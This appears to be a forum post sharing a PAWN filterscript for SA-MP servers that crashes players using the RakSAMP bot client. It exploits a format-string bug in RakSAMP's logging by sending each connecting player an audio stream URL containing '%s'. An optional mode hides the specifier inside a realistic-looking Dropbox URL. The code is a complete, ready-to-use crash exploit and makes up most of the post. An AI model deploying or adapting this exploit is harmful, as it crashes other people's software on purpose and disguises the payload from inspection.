RakCrash
Snippet for crashing RakSAMP players.
Snippet for crashing RakSAMP players.
Description
There's a little bug in RakSAMP so it's possible to crash RakSAMP players by abusing null strings.
How?
RakSAMP crashes when passing string format specifier in Log() function.
Since SA-MP client doesn't crash passing null string inside audio stream, we can abuse this to crash invalid clients such as RakSAMP.
Downloads
PHP Code:
#include <a_samp>
#define FILTERSCRIPT
#define _RAKCRASH_HIDE // Hide "%s" in "real URL".
/********************************************************************************
* How it works? *
* RakSAMP crashes when passing string format specifier in Log() function. *
* File: netrpc.cpp on ScrPlayAudioStream function: *
* Log("[AUDIO_STREAM] %s", szURL); --> if szURL contains %s, it will crash *
* Since SA-MP client doesn't crash passing null string inside audio stream *
* we can abuse this to crash invalid clients such as RakSAMP. *
*********************************************************************************/
public OnPlayerConnect(playerid)
{
#if defined _RAKCRASH_HIDE
PlayAudioStreamForPlayer(playerid, "https://dl.dropboxusercontent.com/s/ac4oqi08gtiuzb0/intro%samp.mp3?dl=0"); // you can use any url containing %s or %20s or something else. It doesn't need to be a valid URL.
#else
PlayAudioStreamForPlayer(playerid, "%s");
#endif
StopAudioStreamForPlayer(playerid);
return 1;
}
Nobody.